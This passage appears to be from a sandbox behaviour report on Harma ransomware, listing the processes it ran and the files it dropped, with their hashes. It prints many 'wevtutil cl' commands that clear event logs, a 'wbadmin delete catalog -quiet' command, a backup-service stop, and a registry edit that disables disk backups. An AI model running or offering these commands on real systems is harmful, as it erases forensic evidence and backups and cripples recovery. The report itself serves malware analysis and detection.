C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IME-JPLMP/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IME-JPPRED/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IME-JPSetting/Analytic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IME-JPTIP/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IME-KRAPI/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IME-KRTIP/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IME-OEDCompiler/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IME-TCCORE/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IME-TCTIP/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IME-TIP/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IPNAT/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IPxlatCfg/Debug"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IPxlatCfg/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IdCtrls/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IdCtrls/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-IndirectDisplays-ClassExtension-Events/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Input-HIDCLASS-Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-InputSwitch/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-KdsSvc/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kerberos/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-AppCompat/General"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-AppCompat/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-ApphelpCache/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-ApphelpCache/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-ApphelpCache/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-IO/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Interrupt-Steering/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-IoTrace/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-LiveDump/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-LiveDump/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Pdc/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Pep/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Boot Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Configuration"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Configuration Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Device Enumeration Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Driver Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Driver Watchdog"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-ShimEngine/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-ShimEngine/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-ShimEngine/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-XDV/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-KeyboardFilter/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-KeyboardFilter/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-KeyboardFilter/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Known Folders API Service"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LSA/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LSA/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LSA/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LimitsManagement/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LinkLayerDiscoveryProtocol/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LinkLayerDiscoveryProtocol/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LiveId/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LiveId/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MPEG2-Video-Encoder-MFT_Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MSFTEDIT/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MUI/Admin"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MUI/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MUI/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MUI/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Media-Streaming/DMC"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Media-Streaming/DMR"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Media-Streaming/MDE"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFCaptureEngine/MFCaptureEngine"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MediaFoundation-Performance/SARStreamResource"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Minstore/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Minstore/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-Api-Internal/Analytic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-Api/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-Parser-Task/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-Parser-Task/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-SmsApi/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/Autopilot"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/Debug"3⤵
-
C:\Windows\system32\cmd.execmd.exe /c wbadmin delete catalog -quiet/1⤵
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet/2⤵
- Deletes backup catalog
- Drops file in Windows directory
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y1⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\HRMPRIVFilesize
2KB
MD5b121ead557b0abbfe97b746f33fd1386
SHA1984a3cea72d28429f1f6c7fe422578625ddffa4a
SHA256a7e066411ed8ed47db834432142a23c68510c1ad89faae989b1cc5ad36245093
SHA5124451865df2a62da037485566dce3574c05c878324266bb5ffc2934f3ff54de66de85787ded0ade6151a4667b340ed9fd3232d67cb2cb70d21f5f0ea482f2c445
-
C:\ProgramData\HRMPRIVFilesize
2KB
MD5b121ead557b0abbfe97b746f33fd1386
SHA1984a3cea72d28429f1f6c7fe422578625ddffa4a
SHA256a7e066411ed8ed47db834432142a23c68510c1ad89faae989b1cc5ad36245093
SHA5124451865df2a62da037485566dce3574c05c878324266bb5ffc2934f3ff54de66de85787ded0ade6151a4667b340ed9fd3232d67cb2cb70d21f5f0ea482f2c445
-
C:\ProgramData\HRMPRIVFilesize
2KB
MD5b121ead557b0abbfe97b746f33fd1386
SHA1984a3cea72d28429f1f6c7fe422578625ddffa4a
SHA256a7e066411ed8ed47db834432142a23c68510c1ad89faae989b1cc5ad36245093
SHA5124451865df2a62da037485566dce3574c05c878324266bb5ffc2934f3ff54de66de85787ded0ade6151a4667b340ed9fd3232d67cb2cb70d21f5f0ea482f2c445
-
C:\ProgramData\HRMPUBFilesize
292B
MD527308274d021814dc02a31275759f62e
SHA130b2202f0b2cda8a0b31e1cf87f824640a7f12ac
SHA256e1f3ee3b74d995c7c153fe96f8e2e35c2dc164fc8cc668efa119f6dd96de1db8
SHA512d6425f5342d32e7bf325a51791dbab7daebc962531683b1b9eb862f10f69d148ac9cfb9277749ac6a7a4aba88361b1b74d73fdb1d945dec446363f1e0cf4169e
-
C:\ProgramData\HRMPUBFilesize
292B
MD527308274d021814dc02a31275759f62e
SHA130b2202f0b2cda8a0b31e1cf87f824640a7f12ac
SHA256e1f3ee3b74d995c7c153fe96f8e2e35c2dc164fc8cc668efa119f6dd96de1db8
SHA512d6425f5342d32e7bf325a51791dbab7daebc962531683b1b9eb862f10f69d148ac9cfb9277749ac6a7a4aba88361b1b74d73fdb1d945dec446363f1e0cf4169e
-
C:\ProgramData\HRMPUBFilesize
292B
MD527308274d021814dc02a31275759f62e
SHA130b2202f0b2cda8a0b31e1cf87f824640a7f12ac
SHA256e1f3ee3b74d995c7c153fe96f8e2e35c2dc164fc8cc668efa119f6dd96de1db8
SHA512d6425f5342d32e7bf325a51791dbab7daebc962531683b1b9eb862f10f69d148ac9cfb9277749ac6a7a4aba88361b1b74d73fdb1d945dec446363f1e0cf4169e
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\harma.exeFilesize
1.0MB
MD55c36e305d926e55ef98d392176890cd2
SHA164a15cdf89b6c8b85cba355b6944074614d810fd
SHA2565671112c276673ee5c4630994ac0034927cee2aa05a32ca6950edbc80c56e7e8
SHA512082855fadbe445ab1f582bb7773276c08bded82ecd00ae1651b620aa12e97315d01acea3cfbe99c504d6d74ce1cff471a4993ff8ebb93416df787cefa88baf1b
-
C:\ProgramData\harma.exeFilesize
1.0MB
MD55c36e305d926e55ef98d392176890cd2
SHA164a15cdf89b6c8b85cba355b6944074614d810fd
SHA2565671112c276673ee5c4630994ac0034927cee2aa05a32ca6950edbc80c56e7e8
SHA512082855fadbe445ab1f582bb7773276c08bded82ecd00ae1651b620aa12e97315d01acea3cfbe99c504d6d74ce1cff471a4993ff8ebb93416df787cefa88baf1b
-
C:\ProgramData\id.harmaFilesize
8B
MD58a181c509d99671514568d26aa564505
SHA149f89bcca0acac4e9843b6be3b947e927dac2b15
SHA2560e9e633117d0ded9c5e4c954e0a69084e634e05666865776870ff9acb3b71969
SHA512a7dba3e641f6ce440a4def8d0e0704162950ae3168b4e663a516d9abb6108730ed27377d9b0354cb0b1ae2d56bccd6e12725fa7504086e5898ad45abc788b491
-
C:\Users\Admin\AppData\Local\Temp\HRMPRIVFilesize
2KB
MD5b121ead557b0abbfe97b746f33fd1386
SHA1984a3cea72d28429f1f6c7fe422578625ddffa4a
SHA256a7e066411ed8ed47db834432142a23c68510c1ad89faae989b1cc5ad36245093
SHA5124451865df2a62da037485566dce3574c05c878324266bb5ffc2934f3ff54de66de85787ded0ade6151a4667b340ed9fd3232d67cb2cb70d21f5f0ea482f2c445
-
C:\Users\Admin\AppData\Local\Temp\HRMPUBFilesize
292B
MD527308274d021814dc02a31275759f62e
SHA130b2202f0b2cda8a0b31e1cf87f824640a7f12ac
SHA256e1f3ee3b74d995c7c153fe96f8e2e35c2dc164fc8cc668efa119f6dd96de1db8
SHA512d6425f5342d32e7bf325a51791dbab7daebc962531683b1b9eb862f10f69d148ac9cfb9277749ac6a7a4aba88361b1b74d73fdb1d945dec446363f1e0cf4169e
-
C:\Users\Admin\AppData\Local\Temp\id.harmaFilesize
8B
MD58a181c509d99671514568d26aa564505
SHA149f89bcca0acac4e9843b6be3b947e927dac2b15
SHA2560e9e633117d0ded9c5e4c954e0a69084e634e05666865776870ff9acb3b71969
SHA512a7dba3e641f6ce440a4def8d0e0704162950ae3168b4e663a516d9abb6108730ed27377d9b0354cb0b1ae2d56bccd6e12725fa7504086e5898ad45abc788b491
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exeFilesize
1.0MB
MD55c36e305d926e55ef98d392176890cd2
SHA164a15cdf89b6c8b85cba355b6944074614d810fd
SHA2565671112c276673ee5c4630994ac0034927cee2aa05a32ca6950edbc80c56e7e8
SHA512082855fadbe445ab1f582bb7773276c08bded82ecd00ae1651b620aa12e97315d01acea3cfbe99c504d6d74ce1cff471a4993ff8ebb93416df787cefa88baf1b